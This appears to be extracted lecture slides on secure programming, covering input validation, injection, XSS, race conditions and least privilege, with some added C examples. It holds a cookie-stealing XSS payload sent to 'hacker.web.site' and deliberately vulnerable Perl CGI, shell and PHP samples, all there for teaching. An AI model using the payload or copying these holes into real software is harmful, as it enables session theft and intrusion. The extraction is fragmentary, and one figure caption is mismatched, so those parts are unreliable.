Chapter 11: Software Security
and validation of data
and error codes
o Awareness of these issues is a critical initial step in writing more secure program code
components
Software error categories:
Table 11.1 CWE/SANS TOP 25 Most Dangerous Software Errors (2011)
Software Security, Quality and Reliability
• Software quality and reliability:
o Concerned with the accidental failure of program
o Improve using structured design and testing to identify and eliminate as many bugs as possible from a program
o Concern is not how many bugs, but how often they are triggered
• Software security:
o Attacker chooses probability distribution, specifically targeting bugs that result in a failure that can be exploited by the attacker
o Triggered by inputs that differ dramatically from what is usually expected
o Unlikely to be identified by common testing approaches
Defensive Programming
• Designing and implementing software so that it continues to function even when under attack
• Requires attention to all aspects of program execution, environment, and type of data it processes
• Software is able to detect erroneous conditions resulting from some attack
• Also referred to as secure programming
• Key rule is to never assume anything, check all assumptions and handle any possible error states
[Figure 11.1 Abstract View of Program: a program executing algorithm, processing input data, generating output; interacting with the Operating System and Other Programs]
Defensive Programming
• Programmers often make assumptions about the type of inputs a program will receive and the environment it executes in
o Assumptions need to be validated by the program and all potential failures handled gracefully and safely
• Requires a changed mindset to traditional programming practices
o Programmers have to understand how failures can occur and the steps needed to reduce the chance of them occurring in their programs
• Conflicts with business pressures to keep development times as short as possible to maximize market advantage
Security by Design
• Security and reliability are common design goals in most engineering disciplines
• Software development not as mature
• Recent years have seen increasing efforts to improve secure software development processes
• Software Assurance Forum for Excellence in Code (SAFECode)
o Develop publications outlining industry best practices for software assurance and providing practical advice for implementing proven methods for secure software development
Handling Program Input
Incorrect handling is a very common failing
Input is any source of data from outside whose value is not explicitly known by the programmer when the code was written
Must identify all data sources
Explicitly validate assumptions on size and type of values before use
Input Size & Buffer Overflow
• Programmers often make assumptions about the maximum expected size of input
o Allocated buffer size is not confirmed
o Resulting in buffer overflow
• Testing may not identify vulnerability
o Test inputs are unlikely to include large enough inputs to trigger the overflow
• Safe coding treats all input as dangerous
Interpretation of Program Input
• Program input may be binary or text
o Binary interpretation depends on encoding and is usually application specific
• There is an increasing variety of character sets being used
o Care is needed to identify just which set is being used and what characters are being read
• Failure to validate may result in an exploitable vulnerability
• 2014 Heartbleed OpenSSL bug is a recent example of a failure to check the validity of a binary input value
to save coding effort
• Often used as Web CGI scripts
#!/usr/bin/perl
# finger.cgi - finger CGI script using Perl5 CGI module

use CGI;
use CGI::Carp qw(fatalsToBrowser);
$q = new CGI; # create query object

<form method=post action="finger.cgi">
<b>Username to finger</b>: <input type=text name=user value="">
<p><input type=submit value="Finger User">
</form></body></html>
(b) Finger form

Finger User
Login Name TTY Idle Login Time Where
lpb Lawrie Brown p0 Sat 15:24 ppp41.grapevine

Finger User
attack success
-rwxr-xr-x 1 lpb staff 537 Oct 21 16:19 finger.cgi
-rw-r--r-- 1 lpb staff 251 Oct 21 16:14 finger.html
(c) Expected and subverted finger CGI responses

# get name of user and display their finger details
$user = $q->param("user");
die "The specified user contains illegal characters!"
    unless ($user =~ /^\w+$/);
print `/usr/bin/finger -sh $user`;
(d) Safety extension to Perl finger CGI script
Figure 11.2 A Web CGI Injection Attack
<?php
include $path . 'functions.php';
include $path . 'data/prefs.php';
Cross Site Scripting (XSS)
Commonly seen in scripted Web applications
• Vulnerability involves the inclusion of script code in the HTML content
• Script code may need to access data associated with other pages
• Browsers impose security checks and restrict data access to pages originating from the same site
Exploit assumption that all content from one site is equally trusted and hence is permitted to interact with other content from the site
XSS reflection vulnerability
• Attacker includes the malicious script content in data supplied to a site
Thanks for this information, its great!
<script>document.location='http://hacker.web.site/cookie.cgi?'+ document.cookie</script>
(a) Plain XSS example
Validating Input Syntax
Input data should be compared against what is wanted
Alternative is to compare the input data with known dangerous values
By only accepting known safe data the program is more likely to remain secure
Growing requirement to support users around the globe and to interact with them using their own languages
Unicode used for
• Many Unicode decoders accept any valid equivalent sequence
Canonicalization
• Transforming input data into a single, standard, minimal representation
• Once this is done the input data can be compared with a single representation of acceptable input values
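Added example, not from the textbook, of the canonicalization step described above for UTF-8 input: the decoder accepts only the shortest encoding of each code point (an "equivalent sequence" such as an overlong form, a surrogate or an out-of-range value is rejected), and only the canonical result is compared against an allow list. The allow-list policy and the function names are the example's own.

```c
#include <stddef.h>
#include <stdint.h>

/* Decode one UTF-8 sequence strictly: only the shortest (canonical) encoding
 * is accepted; overlong forms, UTF-16 surrogates and values above 0x10FFFF
 * are rejected. Returns bytes consumed, or 0 on error; code point in *cp. */
size_t utf8_decode_strict(const unsigned char *s, size_t n, uint32_t *cp)
{
    size_t len;
    uint32_t min;
    if (n == 0) return 0;
    unsigned char b = s[0];
    if (b < 0x80) { *cp = b; return 1; }
    if ((b & 0xE0) == 0xC0)      { len = 2; *cp = b & 0x1F; min = 0x80; }
    else if ((b & 0xF0) == 0xE0) { len = 3; *cp = b & 0x0F; min = 0x800; }
    else if ((b & 0xF8) == 0xF0) { len = 4; *cp = b & 0x07; min = 0x10000; }
    else return 0;                     /* stray continuation byte or 0xF8+ lead */
    if (n < len) return 0;             /* truncated sequence */
    for (size_t i = 1; i < len; i++) {
        if ((s[i] & 0xC0) != 0x80) return 0;
        *cp = (*cp << 6) | (s[i] & 0x3F);
    }
    if (*cp < min) return 0;           /* overlong: a longer equivalent of a shorter form */
    if (*cp >= 0xD800 && *cp <= 0xDFFF) return 0;
    if (*cp > 0x10FFFF) return 0;
    return len;
}

/* Allow-list check on the canonical form: ASCII letters, digits, '-' and '_'
 * only (an example policy for a user name, not the textbook's). */
int is_safe_name(const unsigned char *s, size_t n)
{
    if (n == 0) return 0;
    for (size_t i = 0; i < n; ) {
        uint32_t c;
        size_t k = utf8_decode_strict(s + i, n - i, &c);
        if (k == 0) return 0;          /* non-canonical input never reaches the allow list */
        if (!((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
              (c >= '0' && c <= '9') || c == '-' || c == '_')) return 0;
        i += k;
    }
    return 1;
}
```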
o Floating point numbers depend on the processor used
o Values may be signed or unsigned
• Must correctly interpret text form and process consistently
o Have issues comparing signed to unsigned
o Could be used to thwart buffer overflow check
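Added example, not from the textbook, covering the unconfirmed buffer size from the Input Size slide and the signed/unsigned comparison here: a length check written with signed ints lets a negative length through, and the conversion to size_t at memcpy turns it into a huge copy; the hardened check rejects negatives before comparing as size_t. BUFSIZE and the function names are the example's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUFSIZE 16

/* Vulnerable check: the length parsed from input is kept as a signed int
 * and compared with a signed constant, so a negative value passes. The
 * same value converted to size_t by memcpy becomes a huge copy length.
 * Returns 1 if the check would let a copy proceed; no copy is done. */
int unsafe_length_check(int len)
{
    return len <= BUFSIZE;                  /* -1 <= 16 is true */
}

/* What memcpy actually receives when handed a signed length. */
size_t length_as_passed_to_memcpy(int len)
{
    return (size_t)len;                     /* -1 becomes SIZE_MAX */
}

/* Mixed signed/unsigned comparison: len is converted to size_t before the
 * compare (compilers warn with -Wsign-compare), so -1 < 16 is false here. */
int mixed_sign_less_than(int len, size_t cap)
{
    return len < cap;
}

/* Hardened check: reject negatives explicitly, then compare as size_t
 * against the real buffer size. Returns 1 only for 0 <= len <= BUFSIZE. */
int safe_length_check(int len)
{
    if (len < 0) return 0;
    return (size_t)len <= BUFSIZE;
}

/* Copy an input record into a fixed buffer, refusing anything the safe
 * check does not accept. Returns bytes copied, or -1 when rejected. */
int copy_record(char dst[BUFSIZE], const char *src, int len)
{
    if (!safe_length_check(len)) return -1;
    memcpy(dst, src, (size_t)len);
    return len;
}
```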
Input Fuzzing
• Developed by Professor Barton Miller at the University of Wisconsin Madison in 1989
• Software testing technique that uses randomly generated data as inputs to a program
o Range of inputs is very large
o Intent is to determine if the program or function correctly handles abnormal inputs
o Simple, free of assumptions, cheap
o Assists with reliability as well as security
• Can also use templates to generate classes of known problem inputs
o Disadvantage is that bugs triggered by other forms of input would be missed
o Combination of approaches is needed for reasonably comprehensive coverage of the inputs
Writing Safe Program Code
Security issues:
• Correct algorithm implementation
• Correct machine instructions for algorithm
• Valid manipulation of data
Correct Algorithm Implementation
Issue of good program development technique
Algorithm may not correctly handle all problem variants
Combination of the sequence number as an identifier and authenticator of packets and the failure to make them sufficiently unpredictable enables the attack to occur
Another variant is when the programmers deliberately include additional code in a program to help test and debug it
Often code remains in production release of a program and could inappropriately release information
May permit a user to bypass security checks and perform actions they would not otherwise be allowed to perform
This vulnerability was exploited by the Morris Internet Worm
Ensuring Machine Language Corresponds to Algorithm
• Issue is ignored by most programmers
o Assumption is that the compiler or interpreter generates or executes code that validly implements the language statements
• Requires comparing machine code with original source
o Slow and difficult
• Development of computer systems with very high assurance level is the one area where this level of checking is required
o Specifically Common Criteria assurance level of EAL 7
Correct Data Interpretation
o Accessed and manipulated in memory or copied into processor registers before
capabilities for restricting and validating interpretation
Correct Use of Memory
• Issue of dynamic memory allocation
o Used to manipulate unknown amounts of data
o Allocated when needed, released when done
o Use standard library routines to allocate and release memory
• Modern languages handle automatically
o Processes or threads wait on a resource held by the other
o One or more programs has to be terminated
Operating System Interaction
• Programs execute on systems under the control of an operating system
o Mediates and shares access to resources
o Constructs execution environment
o Includes environment variables and arguments
• Systems have a concept of multiple users
o Resources are owned by a user and have permissions granting access with various rights to different categories of users
o Programs need access to various resources, however excessive levels of access are dangerous
o Concerns when multiple programs access shared resources such as a common file
Environment Variables
• Collection of string values inherited by each process from its parent
o Can affect the way a running process behaves
o Included in memory when it is constructed
• Can be modified by the program process at any time
o Modifications will be passed to its children
• Another source of untrusted program input
• Most common use is by a local user attempting to gain increased privileges
o Goal is to subvert a program that grants superuser or administrator privileges
#!/bin/bash
user=`echo $1 | sed 's/@.*$//'`
grep $user /var/local/accounts/ipaddrs
(a) Example vulnerable privileged shell script

#!/bin/bash
PATH="/sbin:/bin:/usr/sbin:/usr/bin"
export PATH
user=`echo $1 | sed 's/@.*$//'`
grep $user /var/local/accounts/ipaddrs
(b) Still vulnerable privileged shell script
Figure 11.6 Vulnerable Shell Scripts
If dynamically linked may be
or prevent use of this variable
Use of Least Privilege
Determine appropriate user and group privileges required
• Decide whether to grant extra user or just group privileges
Ensure that privileged program can modify only those files and directories necessary
Root/Administrator Privileges
Programs with root/administrator privileges are a major target of attackers
Often privilege is only needed at start
Good design partitions complex programs in smaller modules with needed privileges
• Can then run as normal user
• Provides a greater degree of isolation between the components
• Reduces the consequences of a security breach in one component
• Easier to test and verify
System Calls and Standard Library Functions
Programs use system calls and standard library functions for common operations
Programmers make assumptions about their operation
• If incorrect behavior is not what is expected
• May be a result of system optimizing access to shared resources
• Results in requests for services being buffered, resequenced, or otherwise modified to optimize system use
• Optimizations can conflict with program goals
patterns = [10101010, 01010101, 11001100, 00110011, 00000000, 11111111, … ]
open file for writing
for each pattern
    seek to start of file
    overwrite file contents with pattern
close file
remove file
(a) Initial secure file shredding program algorithm

patterns = [10101010, 01010101, 11001100, 00110011, 00000000, 11111111, … ]
open file for update
for each pattern
    seek to start of file
    overwrite file contents with pattern
    flush application write buffers
    sync file system write buffers with device
close file
remove file
(b) Better secure file shredding program algorithm
Figure 11.7 Example Global Data Overflow Attack
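Added example, not from the textbook, implementing algorithm (b) above in C: each overwrite pass is pushed through the stdio buffer with fflush and through the file system cache with fsync before the next pass, which is the step the library and OS optimizations would otherwise collapse. The concrete pattern list (the figure's "…" is left open) and the temp-file helper are the example's own.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>   /* fsync, fileno, write, close: POSIX */

/* Overwrite patterns as in the textbook's algorithm; the figure's "..." is
 * left open, so this concrete list is the example's own choice. */
static const unsigned char patterns[] = { 0xAA, 0x55, 0xCC, 0x33, 0x00, 0xFF };

/* Overwrite every byte of the file with each pattern in turn, pushing each
 * pass through the stdio buffer (fflush) and the file system cache (fsync)
 * to the device before the next pass, then remove the file. Without the two
 * flushes the library and OS may merge the passes and write only the last.
 * Returns 0 on success, -1 on failure (file left in place). */
int shred_file(const char *path)
{
    FILE *f = fopen(path, "r+b");              /* open for update, not truncate */
    if (!f) return -1;
    if (fseek(f, 0, SEEK_END) != 0) { fclose(f); return -1; }
    long size = ftell(f);
    if (size < 0) { fclose(f); return -1; }
    for (size_t p = 0; p < sizeof patterns; p++) {
        unsigned char block[4096];
        memset(block, patterns[p], sizeof block);
        rewind(f);                              /* seek to start of file */
        for (long left = size; left > 0; ) {
            size_t chunk = left > (long)sizeof block ? sizeof block : (size_t)left;
            if (fwrite(block, 1, chunk, f) != chunk) { fclose(f); return -1; }
            left -= (long)chunk;
        }
        if (fflush(f) != 0) { fclose(f); return -1; }         /* application buffers */
        if (fsync(fileno(f)) != 0) { fclose(f); return -1; }  /* file system buffers */
    }
    if (fclose(f) != 0) return -1;
    return remove(path) == 0 ? 0 : -1;
}

/* Creates a temporary file holding constructed sample data; tmpl is a
 * mkstemp template and receives the generated name. Returns 0 or -1. */
int make_sample_file(char *tmpl, const char *data)
{
    int fd = mkstemp(tmpl);
    if (fd < 0) return -1;
    size_t n = strlen(data);
    int ok = write(fd, data, n) == (ssize_t)n;
    return (close(fd) == 0 && ok) ? 0 : -1;
}
```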
Preventing Race Conditions
• Programs may need to access a common system resource
• Need suitable synchronization mechanisms
o Most common technique is to acquire a lock on the shared file
• Lockfile
o Process must create and own the lockfile in order to gain access to the shared resource
# open data file and acquire exclusive access lock
open (FILE, ">> $FILENAME") || die "Failed to open $FILENAME \n";
flock FILE, $EXCL_LOCK;
… use exclusive access to the forminfo file to save details
# unlock and close file
flock FILE, $UNLOCK;
close(FILE);
Figure 11.8 Perl File Locking Example
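Added example, not from the textbook, of the lockfile rule on the Preventing Race Conditions slide (a process must create and own the lockfile to gain access): creating it with O_CREAT|O_EXCL is a single atomic step, shown beside the check-then-create form it replaces. The function names are the example's own.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/* Create and own the lockfile in one atomic step. With O_EXCL, open() fails
 * with EEXIST when the file already exists, so there is no window between
 * "does it exist?" and "create it" for a second process to slip through.
 * Returns 0 when acquired, 1 when another holder exists, -1 on other errors. */
int acquire_lockfile(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0644);
    if (fd < 0) return errno == EEXIST ? 1 : -1;
    /* record the owner's pid so a stale lock can be diagnosed by an operator */
    char buf[32];
    int n = snprintf(buf, sizeof buf, "%ld\n", (long)getpid());
    if (n <= 0 || write(fd, buf, (size_t)n) != n) { close(fd); unlink(path); return -1; }
    return close(fd) == 0 ? 0 : -1;
}

/* Release the lock; only the process that acquired it should call this. */
int release_lockfile(const char *path)
{
    return unlink(path) == 0 ? 0 : -1;
}

/* The shape of the mistake the lockfile rule guards against: the existence
 * test and the creation are two separate system calls, so two processes can
 * both observe "no lockfile" and both believe they own the resource.
 * Kept for contrast with acquire_lockfile above. */
int racy_acquire_lockfile(const char *path)
{
    if (access(path, F_OK) == 0) return 1;
    int fd = open(path, O_WRONLY | O_CREAT, 0644);   /* no O_EXCL */
    if (fd < 0) return -1;
    return close(fd) == 0 ? 0 : -1;
}
```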